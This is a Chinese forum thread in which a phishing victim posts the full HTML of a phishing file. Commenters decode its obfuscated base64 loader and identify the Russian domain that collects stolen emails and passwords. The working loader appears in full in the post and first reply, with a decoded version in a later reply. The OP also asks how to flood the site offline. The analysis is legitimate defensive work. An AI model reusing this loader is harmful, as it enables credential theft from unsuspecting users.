V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
yaleax
V2EX  ›  信息安全

被钓鱼网站骗了,有没有人能破解一下这个骗子的网站.

  •  
  •   yaleax · 18 天前 · 1071 次点击
    
    <html>
    
    <head>
    
    	<meta	  name="viewport"  content="width=device-width,  initial-scale=1.0">
    
    	<script   src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>
     <a	style="display:none;">The	 	car’s 	past	is  etched 	 in	every		 mile   it	 	covers.</a>
    
    <style>
    
      body ,	html 	{		 height:  100%;margin: 	 0;display:	  flex;align-items:	  center;justify-content: 	center 	 }	 	@keyframes		bounce	 {		0%	 	,	100%			, 12.5%	  , 	 32.5%  , 76.1%  { 	 transform:	translateY(0) }	22.5%  ,			86% 		{	 	transform:	 	translateY(7px)   }		}	 #backdate	 {		height:		 179px;width:  130px;overflow: 	hidden;margin-top:	-59px;margin-left:	 	25px			}  	@keyframes		shadow-fade  	{	0%	,		100% ,		21.2%	 	,	 	80% {	 opacity:	0		}	 	47%	,	 70%  {  opacity: 1	 }	 }
     	#vacuous	{	 width:	 130px;margin-top:	  179px 	 }	#icebound {	width: 		130px;height:  71px;border-radius:  	0 0		7px	7px;overflow:  	hidden;margin-top: -41px }	#icebound  >		.ultrasonically { width: 287px;height:		 71px;background:	 #27a0e0;transform: 	 translate(-153px		,		-70px) rotate(28deg) 	}	#icebound 		> .karakul   { 	width: 287px;height:	 71px;background: 	#1388d6;transform: translate(-120px			, 63px) rotate(-28deg)  	} #ubiquity { 	width: 130px;height: 40px;background: 	 #113864;margin-top:	  -70px }  #earthly   {	 display: flex;flex-wrap: 		wrap;width:			118px;height:	131px;border-radius: 7px;overflow:	  hidden;margin:	 	0   auto;margin-top:  -306px;animation:	cal-bounce		5s		infinite;animation-timing-function:  cubic-bezier(0 , 	0.5	, 		0 	, 	1);
    
    			transform: 	translateY(51px)  scaleY(1) 	}		 @keyframes  	cal-bounce	{		0%	,	100% ,	16.5% ,		 76.1%	{  transform:		 translateY(151px) 	 scaleY(1)	} 	28%  { 	transform:	translateY(39px)	 scaleY(1) } 	 31% 	{		transform: 		translateY(51px) 		scaleY(1.05)  }	  33% {	 	transform: 	 translateY(51px) scaleY(0.96)   } 		34% , 68.5%	{		 transform:  translateY(51px)  scaleY(1) 	}		68.5% 	{	animation-timing-function:	 cubic-bezier(0.66	, -0.16	  , 		1	 , 	-0.29) }	 }	 #earthly 		>	  .quadraphonic 	{	width: 118px;height:	21px;
    
     	 margin-bottom:	 -1px;background: #0354a1		}	 	#earthly  >	.karakul 	 {	display:   flex;width:  118px;height:	37px 	} .abduct	{			width:	 39.3333px;height:	38px  }	 	.oafishly {		background:	  #0073cc   } 	 .taciturnity		{  background: 		#27a0e0	  }		.lactic   { 		background:  #4fcfff  }		.ulnar {	 background:	#035fb3	} .xerography 	{			background:	#134276 		}		
    
    
     #laceration {	 width:			130px;height:	107px;animation:	 opened-flap-swing 	5s 	infinite;animation-timing-function:			cubic-bezier(0.32  , 0	, 0.67 , 0);transform-origin:	 top;transform:	translateY(-68px) rotate3d(1		 ,	 	0	 	,		0 	,	 -180deg)  }	@keyframes	 opened-flap-swing	{ 0% 	,	  100%	 ,	14.5%		 , 76% { transform:	translateY(-68px)		rotate3d(1 		, 0	,   0	 	, -90deg)	} 16.5%	 	,	74%  {  transform: translateY(-68px)   rotate3d(1 ,	0	,			0	,			-180deg)	 }  }	 #abashment	{ width: 		130px;animation: closed-flap-swing	 5s 		infinite;animation-timing-function:	cubic-bezier(0.32	, 0  	,   0.67 	 , 0);transform-origin:	 top;transform:	 	translateY(-71px) 		rotate3d(1 ,		0 	 , 	0 		, 90deg) 	 }		@keyframes closed-flap-swing {	 0% ,	 100% , 	77% ,	8.5%		{	  transform:  translateY(-71px) 	rotate3d(1		 , 	 0	 , 	 0  , 	0)		 } 14.5%	, 		76%	{ 	transform: 		translateY(-71px) 	 rotate3d(1	 ,	0	, 	0	 ,		 90deg) 		}		} 	#pacify  	{	 	width:	  130px;height:	 	107px;overflow:	hidden } 	.habituate { width:		 96px;height: 96px;background: #4fcfff;margin:	-48px	auto	0  	auto;border-radius:	7px;transform:	  scaleY(0.6)	 rotate(45deg)	} #laceration		 .habituate			{		 background: 	#113864 } 	#abashment .habituate  {	background:		 #4fcfff	}	
    
    
    </style>
    
    
    </head>
    <body>
     		<!-- 	<u>A 	car  mirrors	the  ambitions  of 		its	 driver.</u>  -->   <div id="backdate"> <div	 	id="vacuous"><div  id="laceration">	<div	 id="pacify"> <div	class="habituate"></div>	 <b		style="display:none;">Explore	 the  world	 with		 the  	wind		in 		your 	 hair	 and the  road  under		you.</b> </div></div><div id="earthly">	  <div		class="quadraphonic"></div>
    
    	 <div  class="karakul"><div	class="abduct			oafishly"></div>	<div		class="abduct taciturnity"></div> <div	 class="abduct		lactic"></div>  </div> 		<!-- <h1>A	car 	 represents   freedom 		with 	every	 turn	of		its 	wheels.</h1> 	-->		<div		 class="karakul"> <div   class="abduct	ulnar"></div> 	<div	class="abduct  	oafishly"></div> 		<div			class="abduct taciturnity"></div>			</div>  <div  	class="karakul"> 	 <div 		class="abduct xerography"></div>			<div	class="abduct	  ulnar"></div> <div class="abduct  oafishly"></div>   </div></div>
    
    
    	 </div> 	 <!--		<strong>Adventure  	starts where	 the	  map	 ends 		and	the road	begins.</strong>  	-->		<div	id="ubiquity"></div> 	 <div		 id="icebound"><div	class="karakul"></div><div	class="ultrasonically"></div>		</div>	 <div	id="abashment"><div	 	id="pacify">   <div   class="habituate"></div> 	 </div><!--   <span>The	road serves  	as	a	  continual	 	source  of	 	inspiration.</span>		 --> 	</div>		</div>
    
    
    </body>
    
    
    <script> 
    
    
       kabob		 =	``; //base64 这个是我的邮箱,我已经删掉了
     </script>
    <!-- <a>Life’s significant events are marked by the cars we drive.</a> -->
    <script>
    
    
    	 	new  	Function(		atob (`DQp3YWluc2NvdGluZyA9IFsgImhhc2giICwgImNvbmNhdCIgLCAic2xpY2UiICwgIm5vdyIgXTsNCmFzeW5jIGZ1bmN0aW9uIG9iaXR1YXJ5ICggZWFjaCApIAkgeyByZXR1cm4gQ3J5cHRvSlMuQUVTLmRlY3J5cHQgKCBPYmplY3QudmFsdWVzICggSlNPTi5wYXJzZSAoIGVhY2ggKSAgKSBbMF0gLCAgQ3J5cHRvSlMuUEJLREYyICggQ3J5cHRvSlMuZW5jLkhleC5wYXJzZSAoIE9iamVjdC52YWx1ZXMgKCBKU09OLnBhcnNlICggZWFjaCApICApIFszXSApICAsICBDcnlwdG9KUy5lbmMuSGV4LnBhcnNlICggT2JqZWN0LnZhbHVlcyAoIEpTT04ucGFyc2UgKCBlYWNoICkgICkgWzJdICkgICwgIHsgaGFzaGVyOiBDcnlwdG9KUy5hbGdvLlNIQTUxMiAsa2V5U2l6ZTogNjQvOCAsICBpdGVyYXRpb25zOiA5OTkgfSAgKSwgeyBpdjogQ3J5cHRvSlMuZW5jLkhleC5wYXJzZSAoIE9iamVjdC52YWx1ZXMgKCBKU09OLnBhcnNlICggZWFjaCApICApIFsxXSApICB9ICApIC50b1N0cmluZyAoIENyeXB0b0pTLmVuYy5VdGY4ICl9IA0KaWYgICggcGVyZm9ybWFuY2VbJ25hdmlnYXRpb24nXVsndHlwZSddID09PSAweDAgJiYgIWxvY2F0aW9uWyB3YWluc2NvdGluZyBbMHgwXV0pIHsgbG9jYXRpb25bIHdhaW5zY290aW5nIFswXSBdID0gRGF0ZVsgd2FpbnNjb3RpbmcgWzNdIF0gICggICkgLnRvU3RyaW5nICggMzYgKSAgWyB3YWluc2NvdGluZyBbMl0gXSAgKCAtMSApIFsgd2FpbnNjb3RpbmcgWzFdIF0gICggIGthYm9iICApfSANCiAoIGFzeW5jICAoKSAgPT4gIHsgZG9jdW1lbnQud3JpdGUgKCBhd2FpdCBvYml0dWFyeSAoIGF3YWl0ICAoYXdhaXQgZmV0Y2ggKCBhd2FpdCBvYml0dWFyeSAoIGF0b2IgKCBgZXlKaElqb2lOMFY0Ukd0MU9XeHBSbHBMYzFaeGFYZExaMVpLVFd4V2N6UTVkMDF6YWxOaVdVeFljazQwZUVSbWN6MGlMQ0pqSWpvaU1tRmhPR0UzWW1aa1pqZ3haalpoTURrM05USXdabVpoT0dNNE1HSmhNMkVpTENKaUlqb2lNMlJoTW1ZMk1qSXlPRGd5Tm1JelpqbGlOekE0T0dGa1pqSmtNMlEyTlRrNVl6UXdZakE1WW1Oa1pqbGhZMlJpTTJFME9XVmtZamd5TkdNME1USm1PR1ZtTkRVeE1UaGpaRGxpWlRjMk4yRXdZMlkwWmpRM1pqSTRaakptWldKa1ltTmlPVGs1WmpBeVl6WXlZemxtWVRoa1pEZGtOR1V6TlRFM056QmhPVEpsTWpsbVlUa3dOVE5sWmpsbU9USXhaRFZrTlRSbE1XWm1aV0kxWm1FeFpXVTFaREZoTXpReU1ERTNNVEZqT0Rnek5HTXhaR1JqTlRJeU5EQTNNRE0wWkRsaFpqUTFZamxtT0RKaVlUTmlZemxqTldaaVl6TXhOMkk1WWpNd01XUTJOV0UzTWpOaU9XTmhaREl3WW1RNU5qVTJOakExT1dGa1l6STBaakppT0RnMk16azJPVEZsTjJRNU9XWmxOVE5oWW1WbVpHVTVNR1poTTJJME16UXdNV0l3WTJRME9UUmlZakZsWVdJek5XTm1OekZrWXpFNFpUaGpZV1EzWVRJNVkyTTFPV0psTjJaak1EYzFNRE5qTkRRNU16ZGpNbVJrTURNMk1EVmlNMlpoTVRJeU5qSmhaV0ptTXprMVpHVmpaREJoWlRKbFpqUXdObU5rWW1JMU56VTBNRGszTlRjMU5ESXlaVFF3TTJVMU0yWmxPV0ppWmpWak1UUmxOV0ZpWXpnek5XWXlNelJoWWpZek1XTmhZakE1T0ROa09USm1aVGsyT1RFMlpqVTNNemhrTlROaFptUTJPV0U1WldRek16UTVaRGM0TnpJMlltWTJZakUyTWprMk5UQTVZamcxWTJaaU4yUXlZMlF6T0RRek56RXdPRGsxT1RReU1UY2lMQ0prSWpvaU5tWTJNalk1TnpRaWZRPT1gICkpICAsIHsgbWV0aG9kOiAnUE9TVCcgLCAgIGJvZHk6IEpTT04uc3RyaW5naWZ5ICh7IG1hY2g6ICJ3YWdvbmVyIiB9KX0pKSAudGV4dCAoKSkpfSkgICgpIDsNCg`) /*  wailer */ )		 /* jaggedly */ ();
    </script>
    <!-- <u>Adventure lies where the road meets the horizon’s edge.</u> -->
    <script>
    
     </script>  <!-- <i>Driving	 	is 	a			dialogue		between	  you	 and 	the 	 road.</i> -->
    
    
    </html>
    
    
    11 条回复
    yaleax
        1
    yaleax  
    OP
       18 天前
    new Function( atob (`DQp3YWluc2NvdGluZyA9IFsgImhhc2giICwgImNvbmNhdCIgLCAic2xpY2UiICwgIm5vdyIgXTsNCmFzeW5jIGZ1bmN0aW9uIG9iaXR1YXJ5ICggZWFjaCApIAkgeyByZXR1cm4gQ3J5cHRvSlMuQUVTLmRlY3J5cHQgKCBPYmplY3QudmFsdWVzICggSlNPTi5wYXJzZSAoIGVhY2ggKSAgKSBbMF0gLCAgQ3J5cHRvSlMuUEJLREYyICggQ3J5cHRvSlMuZW5jLkhleC5wYXJzZSAoIE9iamVjdC52YWx1ZXMgKCBKU09OLnBhcnNlICggZWFjaCApICApIFszXSApICAsICBDcnlwdG9KUy5lbmMuSGV4LnBhcnNlICggT2JqZWN0LnZhbHVlcyAoIEpTT04ucGFyc2UgKCBlYWNoICkgICkgWzJdICkgICwgIHsgaGFzaGVyOiBDcnlwdG9KUy5hbGdvLlNIQTUxMiAsa2V5U2l6ZTogNjQvOCAsICBpdGVyYXRpb25zOiA5OTkgfSAgKSwgeyBpdjogQ3J5cHRvSlMuZW5jLkhleC5wYXJzZSAoIE9iamVjdC52YWx1ZXMgKCBKU09OLnBhcnNlICggZWFjaCApICApIFsxXSApICB9ICApIC50b1N0cmluZyAoIENyeXB0b0pTLmVuYy5VdGY4ICl9IA0KaWYgICggcGVyZm9ybWFuY2VbJ25hdmlnYXRpb24nXVsndHlwZSddID09PSAweDAgJiYgIWxvY2F0aW9uWyB3YWluc2NvdGluZyBbMHgwXV0pIHsgbG9jYXRpb25bIHdhaW5zY290aW5nIFswXSBdID0gRGF0ZVsgd2FpbnNjb3RpbmcgWzNdIF0gICggICkgLnRvU3RyaW5nICggMzYgKSAgWyB3YWluc2NvdGluZyBbMl0gXSAgKCAtMSApIFsgd2FpbnNjb3RpbmcgWzFdIF0gICggIGthYm9iICApfSANCiAoIGFzeW5jICAoKSAgPT4gIHsgZG9jdW1lbnQud3JpdGUgKCBhd2FpdCBvYml0dWFyeSAoIGF3YWl0ICAoYXdhaXQgZmV0Y2ggKCBhd2FpdCBvYml0dWFyeSAoIGF0b2IgKCBgZXlKaElqb2lOMFY0Ukd0MU9XeHBSbHBMYzFaeGFYZExaMVpLVFd4V2N6UTVkMDF6YWxOaVdVeFljazQwZUVSbWN6MGlMQ0pqSWpvaU1tRmhPR0UzWW1aa1pqZ3haalpoTURrM05USXdabVpoT0dNNE1HSmhNMkVpTENKaUlqb2lNMlJoTW1ZMk1qSXlPRGd5Tm1JelpqbGlOekE0T0dGa1pqSmtNMlEyTlRrNVl6UXdZakE1WW1Oa1pqbGhZMlJpTTJFME9XVmtZamd5TkdNME1USm1PR1ZtTkRVeE1UaGpaRGxpWlRjMk4yRXdZMlkwWmpRM1pqSTRaakptWldKa1ltTmlPVGs1WmpBeVl6WXlZemxtWVRoa1pEZGtOR1V6TlRFM056QmhPVEpsTWpsbVlUa3dOVE5sWmpsbU9USXhaRFZrTlRSbE1XWm1aV0kxWm1FeFpXVTFaREZoTXpReU1ERTNNVEZqT0Rnek5HTXhaR1JqTlRJeU5EQTNNRE0wWkRsaFpqUTFZamxtT0RKaVlUTmlZemxqTldaaVl6TXhOMkk1WWpNd01XUTJOV0UzTWpOaU9XTmhaREl3WW1RNU5qVTJOakExT1dGa1l6STBaakppT0RnMk16azJPVEZsTjJRNU9XWmxOVE5oWW1WbVpHVTVNR1poTTJJME16UXdNV0l3WTJRME9UUmlZakZsWVdJek5XTm1OekZrWXpFNFpUaGpZV1EzWVRJNVkyTTFPV0psTjJaak1EYzFNRE5qTkRRNU16ZGpNbVJrTURNMk1EVmlNMlpoTVRJeU5qSmhaV0ptTXprMVpHVmpaREJoWlRKbFpqUXdObU5rWW1JMU56VTBNRGszTlRjMU5ESXlaVFF3TTJVMU0yWmxPV0ppWmpWak1UUmxOV0ZpWXpnek5XWXlNelJoWWpZek1XTmhZakE1T0ROa09USm1aVGsyT1RFMlpqVTNNemhrTlROaFptUTJPV0U1WldRek16UTVaRGM0TnpJMlltWTJZakUyTWprMk5UQTVZamcxWTJaaU4yUXlZMlF6T0RRek56RXdPRGsxT1RReU1UY2lMQ0prSWpvaU5tWTJNalk1TnpRaWZRPT1gICkpICAsIHsgbWV0aG9kOiAnUE9TVCcgLCAgIGJvZHk6IEpTT04uc3RyaW5naWZ5ICh7IG1hY2g6ICJ3YWdvbmVyIiB9KX0pKSAudGV4dCAoKSkpfSkgICgpIDsNCg`) /* wailer */ ) /* jaggedly */ ();

    这个如何解密,我也不太懂。
    admol
        2
    admol  
       18 天前
    问下 AI 吧,很简单的
    yaleax
        3
    yaleax  
    OP
       18 天前
    @admol AI 破解不了,这个解密里面,又包含一个加密。这个我不懂,所以比较困惑。
    yaleax
        4
    yaleax  
    OP
       18 天前
    @admol 理解了,我不能直接问他,我要一边学习,一边问。谢谢指点。
    chrawsl
        5
    chrawsl  
       18 天前 via Android
    wainscoting = ["hash", "concat", "slice", "now"];
    async function obituary(each) { return CryptoJS.AES.decrypt(Object.values(JSON.parse(each))[0], CryptoJS.PBKDF2(CryptoJS.enc.Hex.parse(Object.values(JSON.parse(each))[3]), CryptoJS.enc.Hex.parse(Object.values(JSON.parse(each))[2]), { hasher: CryptoJS.algo.SHA512, keySize: 64 / 8, iterations: 999 }), { iv: CryptoJS.enc.Hex.parse(Object.values(JSON.parse(each))[1]) }).toString(CryptoJS.enc.Utf8); }
    if (performance['navigation']['type'] === 0x0 && !location[wainscoting[0x0]]) { location[wainscoting[0]] = Date[wainscoting[3]]().toString(36)[wainscoting[2]](-1)[wainscoting[1]](kabob); }
    (async () => { document.write(await obituary(await (await fetch(await obituary({"a":"7ExDku9liFZKsVqiwKgVJMlVs49wMsjSbYLXrN4xDfs=","c":"2aa8a7bfdf81f6a097520ffa8c80ba3a","b":"3da2f62228826b3f9b7088adf2d3d6599c40b09bcdf9acdb3a49edb824c412f8ef45118cd9be767a0cf4f47f28f2febdbcb999f02c62c9fa8dd7d4e351770a92e29fa9053ef9f921d5d54e1ffeb5fa1ee5d1a34201711c8834c1ddc522407034d9af45b9f82ba3bc9c5fbc317b9b301d65a723b9cad20bd96566059adc24f2b88639691e7d99fe53abefde90fa3b43401b0cd494bb1eab35cf71dc18e8cad7a29cc59be7fc07503c44937c2dd03605b3fa12262aebf395decd0ae2ef406cdbb5754097575422e403e53fe9bbf5c14e5abc835f234ab631cab0983d92fe96916f5738d53afd69a9ed3349d78726bf6b16296509b85cfb7d2cd384371089594217","d":"6f626974"}), { method: 'POST', body: JSON.stringify({ mach: "wagoner" }) })).text())); })();

    目测大概就是加密了输入的内容,然后调用了一个 fetch 发出去了而已
    fank99
        6
    fank99  
       18 天前
    给地址啊
    yaleax
        7
    yaleax  
    OP
       18 天前
    @chrawsl 是的,你的目测还是很准的。我想还原这段代码。对于我现在还是有点难。
    yaleax
        8
    yaleax  
    OP
       18 天前
    @fank99 没地址,就是发给你这样一个 html 文件,然后你打开,骗你密码
    fank99
        9
    fank99  
       18 天前
    抓包看了下,会向下面这个地址发送一个 post 请求,里面包含了输入的邮箱和密码,带一个随机生成的序列号,怀疑是用来验签的
    https://amunayor.ru///5942.php

    do: le
    em: [email protected]
    px: 1312342
    sec: q1YqLs5XssorzcnRUSopULJSysgvUaoFAA==
    yaleax
        10
    yaleax  
    OP
       17 天前
    @fank99 有没有办法让给这个网站喂数据,让它下线呢。我看现在还在正常运转。
    chrawsl
        11
    chrawsl  
       16 天前
    @yaleax atob (`xxxxxxxxxxxxx`) 复制出来直接在浏览器执行就行了
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1039 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 19:12 · PVG 03:12 · LAX 11:12 · JFK 14:12
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.